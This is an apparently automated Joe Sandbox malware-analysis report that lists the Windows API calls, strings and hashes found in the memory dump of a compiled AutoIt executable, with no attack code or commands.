                                                      • Instruction Fuzzy Hash: 44514971904309EFCB14CFA8EC84EAEBBBAEF48310F14842DF95997210C771A944CB60
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00644F7A
                                                        • Part of subcall function 0060049F: timeGetTime.WINMM(?,753DB400,005F0E7B), ref: 006004A3
                                                      • Sleep.KERNEL32(0000000A), ref: 00644FA6
                                                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00644FCA
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00644FEC
                                                      • SetActiveWindow.USER32 ref: 0064500B
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00645019
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00645038
                                                      • Sleep.KERNEL32(000000FA), ref: 00645043
                                                      • IsWindow.USER32 ref: 0064504F
                                                      • EndDialog.USER32(00000000), ref: 00645060
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: @U=u$BUTTON
                                                      • API String ID: 1194449130-2582809321
                                                      • Opcode ID: f61f903f6734971447757984f52585eccc14791949be5e20d1633b2bc194f2ee
                                                      • Instruction ID: 11010adacb0bc7c3b7767db4fb90687f5198adb7589de454024e87f6c55a9040
                                                      • Opcode Fuzzy Hash: f61f903f6734971447757984f52585eccc14791949be5e20d1633b2bc194f2ee
                                                      • Instruction Fuzzy Hash: B1216F74604605BFE7507F60FC89B663BABEB56745F093028F102822B2CBA1AD54CA71
                                                      APIs
                                                        • Part of subcall function 00600957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,005E6B0C,?,00008000), ref: 00600973
                                                        • Part of subcall function 005E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005E4743,?,?,005E37AE,?), ref: 005E4770
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 005E6BAD
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 005E6CFA
                                                        • Part of subcall function 005E586D: _wcscpy.LIBCMT ref: 005E58A5
                                                        • Part of subcall function 0060363D: _iswctype.LIBCMT ref: 00603645
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                      • API String ID: 537147316-1018226102
                                                      • Opcode ID: 9bb52823189857a563a4378697ad4e6383027d28d839b936802c17735431a796
                                                      • Instruction ID: 8cda451835188c35039dcca5bd22771ffc5cd2d71d52c89d4abca6c6cd26a68e
                                                      • Opcode Fuzzy Hash: 9bb52823189857a563a4378697ad4e6383027d28d839b936802c17735431a796
                                                      • Instruction Fuzzy Hash: AC028B301083829FC718EF21C895AAFBBE6BF99354F54481DF4C9972A1DB31D989CB52
                                                      APIs
                                                      • _memset.LIBCMT ref: 00642D50
                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00642DDD
                                                      • GetMenuItemCount.USER32(006A5890), ref: 00642E66
                                                      • DeleteMenu.USER32(006A5890,00000005,00000000,000000F5,?,?), ref: 00642EF6
                                                      • DeleteMenu.USER32(006A5890,00000004,00000000), ref: 00642EFE
                                                      • DeleteMenu.USER32(006A5890,00000006,00000000), ref: 00642F06
                                                      • DeleteMenu.USER32(006A5890,00000003,00000000), ref: 00642F0E
                                                      • GetMenuItemCount.USER32(006A5890), ref: 00642F16
                                                      • SetMenuItemInfoW.USER32(006A5890,00000004,00000000,00000030), ref: 00642F4C
                                                      • GetCursorPos.USER32(?), ref: 00642F56
                                                      • SetForegroundWindow.USER32(00000000), ref: 00642F5F
                                                      • TrackPopupMenuEx.USER32(006A5890,00000000,?,00000000,00000000,00000000), ref: 00642F72
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00642F7E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                      • String ID:
                                                      • API String ID: 3993528054-0
                                                      • Opcode ID: d17ac34e9f1177e36463db5b2848cb145d78a2bfd9859b2b59d2c7d072a706d5
                                                      • Instruction ID: 1c242dd10a78b0e545832894132d4dbf635b4ce10314aeaa267205bf2f2bb7a3
                                                      • Opcode Fuzzy Hash: d17ac34e9f1177e36463db5b2848cb145d78a2bfd9859b2b59d2c7d072a706d5
                                                      • Instruction Fuzzy Hash: 7271E570640207BAEB219F54DC69FEABF66FF04314FB00216F615A62E1C7B15C60DBA4
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 006588D7
                                                      • CoInitialize.OLE32(00000000), ref: 00658904
                                                      • CoUninitialize.OLE32 ref: 0065890E
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00658A0E
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00658B3B
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00672C0C), ref: 00658B6F
                                                      • CoGetObject.OLE32(?,00000000,00672C0C,?), ref: 00658B92
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00658BA5
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00658C25
                                                      • VariantClear.OLEAUT32(?), ref: 00658C35
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                      • String ID: ,,g
                                                      • API String ID: 2395222682-619837891
                                                      • Opcode ID: 20a047ccb10ff83f86c70bef486d5d098d88231a89f5dc6d0a36e82b345b28ba
                                                      • Instruction ID: 45ff97cfad701b47fc31afddc66dc9a4eff17a8a6b4c220a8b0474a19cdbf712
                                                      • Opcode Fuzzy Hash: 20a047ccb10ff83f86c70bef486d5d098d88231a89f5dc6d0a36e82b345b28ba
                                                      • Instruction Fuzzy Hash: 31C138B12083059FD700DF25C88496BBBEAFF89349F00496DF9899B251DB71ED0ACB52
                                                      APIs
                                                        • Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06
                                                      • _memset.LIBCMT ref: 0063786B
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006378A0
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006378BC
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006378D8
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00637902
                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0063792A
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00637935
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0063793A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 1411258926-22481851
                                                      • Opcode ID: 490e9ba58d0fdf3a944135fc7c223296410e717945e401c303a9bb347fe890a9
                                                      • Instruction ID: 024a1aa6402c108e0f9db23634cbe331e0c2e4aaccbc03bdd6204a981e78fbeb
                                                      • Opcode Fuzzy Hash: 490e9ba58d0fdf3a944135fc7c223296410e717945e401c303a9bb347fe890a9
                                                      • Instruction Fuzzy Hash: FC412972C1422DAACF25EFA5EC59DEDBB79BF48350F004029F905A72A1EB705D04CB90
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065FDAD,?,?), ref: 00660E31
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 3964851224-909552448
                                                      • Opcode ID: 780ed3d1b548ffa3ae8497dd45fd059756ea253dc5a5ebfa21ba3cb40857b546
                                                      • Instruction ID: 68f89ee88be6f5f0d1fe8cd058bacdacdc8d730efb7b6ef16baa6b921e7eb4df
                                                      • Opcode Fuzzy Hash: 780ed3d1b548ffa3ae8497dd45fd059756ea253dc5a5ebfa21ba3cb40857b546
                                                      • Instruction Fuzzy Hash: 2641C13125038A9BEF15EF15D855AEF3BA6FF15304F140428FC555B692EB30AE1ACBA0
                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0066755E
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00667565
                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00667578
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00667580
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0066758B
                                                      • DeleteDC.GDI32(00000000), ref: 00667594
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0066759E
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 006675B2
                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 006675BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                      • String ID: @U=u$static
                                                      • API String ID: 2559357485-3553413495
                                                      • Opcode ID: 90fe16f1c9bb42a0140b8c42b3ee40449a4f4f412adf9e43faa72849f02536e1
                                                      • Instruction ID: 17551e8083b5ef40b70d3226ac7ec2f045070342c214b70191e3c67f357bf53a
                                                      • Opcode Fuzzy Hash: 90fe16f1c9bb42a0140b8c42b3ee40449a4f4f412adf9e43faa72849f02536e1
                                                      • Instruction Fuzzy Hash: B3316D72104215BBDF119F64EC08FDA3B6AFF09765F111228FA16E61A0DB71D821DBA4
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0061E2A0,00000010,?,Bad directive syntax error,0066F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0063F7C2
                                                      • LoadStringW.USER32(00000000,?,0061E2A0,00000010), ref: 0063F7C9
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                      • _wprintf.LIBCMT ref: 0063F7FC
                                                      • __swprintf.LIBCMT ref: 0063F81E
                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0063F88D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 1506413516-4153970271
                                                      • Opcode ID: 2a0e57d8cbcfbab314c4666418036a2c56f5e79408405ce141165839ce012b55
                                                      • Instruction ID: 15ec05ee49fc62f04401c640be1d01fd1118f6957d1de438c35567ebdbf1f58d
                                                      • Opcode Fuzzy Hash: 2a0e57d8cbcfbab314c4666418036a2c56f5e79408405ce141165839ce012b55
                                                      • Instruction Fuzzy Hash: 9E212C3195025EABCF15AF91CC4AEEE7B3ABF18300F040866F515661A2EA719A18DB51
                                                      APIs
                                                        • Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06
                                                        • Part of subcall function 005E7924: _memmove.LIBCMT ref: 005E79AD
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00645330
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00645346
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00645357
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00645369
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0064537A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: SendString$_memmove
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2279737902-1007645807
                                                      • Opcode ID: a1fe00b7384cee693c1d695d59bc09c62f9fbfbc90c44f7b48c429ed8b5c63ee
                                                      • Instruction ID: bf97627e92a5a8469a3f7d36d42e67f1b98fd4fb38f4dd92fe3891ece3370e47
                                                      • Opcode Fuzzy Hash: a1fe00b7384cee693c1d695d59bc09c62f9fbfbc90c44f7b48c429ed8b5c63ee
                                                      • Instruction Fuzzy Hash: BF11513195015E7EDB24BBA2DC49DFF6E7DFBD6B44F100419B446970D2EEA00D05C560
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 208665112-3771769585
                                                      • Opcode ID: 84a8c2ae3439d1ef02b7c4444e9f2b6bb3d26635ff255ca10b40b53afd0e0b96
                                                      • Instruction ID: 6682cd3297443b744ac1b1183959f03035370ea4b582309421a945b64ec10bc9
                                                      • Opcode Fuzzy Hash: 84a8c2ae3439d1ef02b7c4444e9f2b6bb3d26635ff255ca10b40b53afd0e0b96
                                                      • Instruction Fuzzy Hash: B2110231504105AFDB28AB30AC4AFEB77BEEF02311F0001BAF54596191EFB19E828A54
                                                      APIs
                                                        • Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
                                                        • Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC
                                                      • CoInitialize.OLE32(00000000), ref: 0064D5EA
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0064D67D
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 0064D691
                                                      • CoCreateInstance.OLE32(00672D7C,00000000,00000001,00698C1C,?), ref: 0064D6DD
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0064D74C
                                                      • CoTaskMemFree.OLE32(?,?), ref: 0064D7A4
                                                      • _memset.LIBCMT ref: 0064D7E1
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0064D81D
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0064D840
                                                      • CoTaskMemFree.OLE32(00000000), ref: 0064D847
                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0064D87E
                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 0064D880
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                      • String ID:
                                                      • API String ID: 1246142700-0
                                                      • Opcode ID: ff94131369f5d4724200f71b6c2652f3ce59fba8b054484ef398272ce00dcd2b
                                                      • Instruction ID: 4263871c5e225ac3e53de86e360918fd5ff3f7484655315be200908317c55287
                                                      • Opcode Fuzzy Hash: ff94131369f5d4724200f71b6c2652f3ce59fba8b054484ef398272ce00dcd2b
                                                      • Instruction Fuzzy Hash: EFB1CA75A00109AFDB04DFA5D888DAEBBB9FF48314F1484A9F909DB261DB70ED45CB50
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 0063C283
                                                      • GetWindowRect.USER32(00000000,?), ref: 0063C295
                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0063C2F3
                                                      • GetDlgItem.USER32(?,00000002), ref: 0063C2FE
                                                      • GetWindowRect.USER32(00000000,?), ref: 0063C310
                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0063C364
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0063C372
                                                      • GetWindowRect.USER32(00000000,?), ref: 0063C383
                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0063C3C6
                                                      • GetDlgItem.USER32(?,000003EA), ref: 0063C3D4
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0063C3F1
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0063C3FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: 8134bafb133f67c7116accc37d12b036266be4845fce8e0a29b7d2c07fac7304
                                                      • Instruction ID: 9f089c79e0a7a52afd963069006f02775708817beb2b428681a6abbd110ecfa8
                                                      • Opcode Fuzzy Hash: 8134bafb133f67c7116accc37d12b036266be4845fce8e0a29b7d2c07fac7304
                                                      • Instruction Fuzzy Hash: 38513271B00205AFDB18CFA9ED99AAEBBB6FB88711F14812DF515E7390D7B19D008B50
                                                      APIs
                                                        • Part of subcall function 005E1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005E2036,?,00000000,?,?,?,?,005E16CB,00000000,?), ref: 005E1B9A
                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 005E20D3
                                                      • KillTimer.USER32(-00000001,?,?,?,?,005E16CB,00000000,?,?,005E1AE2,?,?), ref: 005E216E
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0061BCA6
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005E16CB,00000000,?,?,005E1AE2,?,?), ref: 0061BCD7
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005E16CB,00000000,?,?,005E1AE2,?,?), ref: 0061BCEE
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005E16CB,00000000,?,?,005E1AE2,?,?), ref: 0061BD0A
                                                      • DeleteObject.GDI32(00000000), ref: 0061BD1C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: a4d0684c51a6d21781de0f05ed532c19a277053353a3bff670ccd565110708c3
                                                      • Instruction ID: 14b1b28d8a925c99eae0254ddcbbfa9bfc184c7038c6ed4fb8ffbfd8353d7fa8
                                                      • Opcode Fuzzy Hash: a4d0684c51a6d21781de0f05ed532c19a277053353a3bff670ccd565110708c3
                                                      • Instruction Fuzzy Hash: 14618D31500A50DFCB29EF16E948B697BF7FF41312F14A528E093966A4C7B4A980DF90
                                                      APIs
                                                        • Part of subcall function 005E25DB: GetWindowLongW.USER32(?,000000EB), ref: 005E25EC
                                                      • GetSysColor.USER32(0000000F), ref: 005E21D3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
